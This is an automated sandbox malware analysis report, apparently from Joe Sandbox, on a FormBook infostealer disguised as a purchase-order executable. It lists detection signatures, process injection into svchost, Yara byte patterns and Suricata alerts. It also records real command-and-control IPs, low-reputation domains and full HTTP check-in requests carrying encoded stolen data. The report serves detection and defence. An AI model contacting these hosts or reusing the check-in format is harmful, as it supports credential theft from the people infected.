Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO2-2401-0016 (TR).exe

Overview

General Information

Sample name:PO2-2401-0016 (TR).exe
Analysis ID:1511724
MD5:6f8e7d082d8c039064cbcc813d24dcb4
SHA1:2715db08498311cf04b28be93049916c6684685c
SHA256:392d1c5876d7d023d9d207fd1b5badce5939abad6b4796adb79a292aefb6f574
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO2-2401-0016 (TR).exe (PID: 6484 cmdline: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe" MD5: 6F8E7D082D8C039064CBCC813D24DCB4)
    • svchost.exe (PID: 2964 cmdline: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WwOlfblnYaWmLq.exe (PID: 2612 cmdline: "C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp.exe (PID: 1892 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 6599A09C160036131E4A933168DA245F)
          • WwOlfblnYaWmLq.exe (PID: 728 cmdline: "C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6432 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bdd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13fcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e773:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16972:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", CommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", ParentImage: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe, ParentProcessId: 6484, ParentProcessName: PO2-2401-0016 (TR).exe, ProcessCommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", ProcessId: 2964, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", CommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", ParentImage: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe, ParentProcessId: 6484, ParentProcessName: PO2-2401-0016 (TR).exe, ProcessCommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", ProcessId: 2964, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-16T09:29:43.875285+020020507451Malware Command and Control Activity Detected192.168.2.54971147.57.185.22780TCP
            2024-09-16T09:30:07.474250+020020507451Malware Command and Control Activity Detected192.168.2.55864989.58.49.180TCP
            2024-09-16T09:30:29.659742+020020507451Malware Command and Control Activity Detected192.168.2.558653154.23.184.24080TCP
            2024-09-16T09:30:43.414357+020020507451Malware Command and Control Activity Detected192.168.2.55865785.159.66.9380TCP
            2024-09-16T09:30:56.798181+020020507451Malware Command and Control Activity Detected192.168.2.558661185.173.111.7680TCP
            2024-09-16T09:31:10.331009+020020507451Malware Command and Control Activity Detected192.168.2.558665203.161.43.22880TCP
            2024-09-16T09:31:23.649305+020020507451Malware Command and Control Activity Detected192.168.2.558669161.97.168.24580TCP
            2024-09-16T09:31:38.353891+020020507451Malware Command and Control Activity Detected192.168.2.558673172.96.191.3980TCP
            2024-09-16T09:31:51.621138+020020507451Malware Command and Control Activity Detected192.168.2.558677104.21.20.12580TCP
            2024-09-16T09:32:07.548753+020020507451Malware Command and Control Activity Detected192.168.2.55490743.242.202.16980TCP
            2024-09-16T09:32:28.946660+020020507451Malware Command and Control Activity Detected192.168.2.554911104.207.148.13780TCP
            2024-09-16T09:32:42.501756+020020507451Malware Command and Control Activity Detected192.168.2.554915185.104.29.1280TCP
            2024-09-16T09:32:56.015666+020020507451Malware Command and Control Activity Detected192.168.2.55491965.21.196.9080TCP
            2024-09-16T09:33:18.095887+020020507451Malware Command and Control Activity Detected192.168.2.55492347.57.185.22780TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: PO2-2401-0016 (TR).exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: PO2-2401-0016 (TR).exeVirustotal: Detection: 48%Perma Link
            Source: PO2-2401-0016 (TR).exeReversingLabs: Detection: 50%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PO2-2401-0016 (TR).exeJoe Sandbox ML: detected
            Source: PO2-2401-0016 (TR).exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WwOlfblnYaWmLq.exe, 00000003.00000000.2201599538.00000000007AE000.00000002.00000001.01000000.00000004.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4508332207.00000000007AE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.2247452645.0000000003F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2247372843.000000000321A000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4513030098.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4509012670.0000000001498000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059592529.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, PO2-2401-0016 (TR).exe, 00000000.00000003.2061283360.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184300413.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2182333043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2282930562.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2284887990.0000000002C85000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002E30000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002FCE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059592529.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, PO2-2401-0016 (TR).exe, 00000000.00000003.2061283360.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2279732575.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184300413.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2182333043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000005.00000003.2282930562.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2284887990.0000000002C85000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002E30000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002FCE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000005.00000002.4510222204.000000000345C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000692000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2626008848.000000002F2AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000005.00000002.4510222204.000000000345C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000692000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2626008848.000000002F2AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000002.00000003.2247452645.0000000003F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2247372843.000000000321A000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4513030098.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4509012670.0000000001498000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0018C2A2 FindFirstFileExW,0_2_0018C2A2
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C68EE FindFirstFileW,FindClose,0_2_001C68EE
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_001C698F
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001BD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001BD076
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001BD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001BD3A9
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001C9642
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001C979D
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_001C9B2B
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001BDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_001BDBBE
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_001C5C97
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0035C380 FindFirstFileW,FindNextFileW,FindClose,5_2_0035C380
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4x nop then xor eax, eax5_2_00349B30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4x nop then mov ebx, 00000004h5_2_02BD04E7

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58669 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58661 -> 185.173.111.76:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:54911 -> 104.207.148.137:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:54919 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49711 -> 47.57.185.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:54915 -> 185.104.29.12:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58649 -> 89.58.49.1:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:54923 -> 47.57.185.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58657 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58665 -> 203.161.43.228:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58677 -> 104.21.20.125:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:54907 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58653 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58673 -> 172.96.191.39:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.golbasi-nakliyat.xyz
            Source: DNS query: www.kckartal.xyz
            Source: DNS query: www.070001350.xyz
            Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
            Source: Joe Sandbox ViewIP Address: 47.57.185.227 47.57.185.227
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: Joe Sandbox ViewASN Name: AS-ZXCSNL AS-ZXCSNL
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001CCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_001CCE44
            Source: global trafficHTTP traffic detected: GET /w9nd/?bX=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.726075.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xcfw/?bX=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.freepicture.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p39s/?RFRd_=tFLD&bX=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.hm62t.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /k2vl/?bX=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.golbasi-nakliyat.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /lwt6/?bX=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.mfgamecompany.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ftr3/?bX=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.quilo.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wjff/?bX=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.qiluqiyuan.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3lkx/?bX=RihUS+ZcBcWtP49fbKLPl8hUiWX9OeM0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4uYWL7+sOZXKma82UzwNxpRmep+gGd7K5Ptmsj9EAWiB5wAw==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.bola88site.oneConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /h5qr/?bX=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&RFRd_=tFLD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kckartal.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
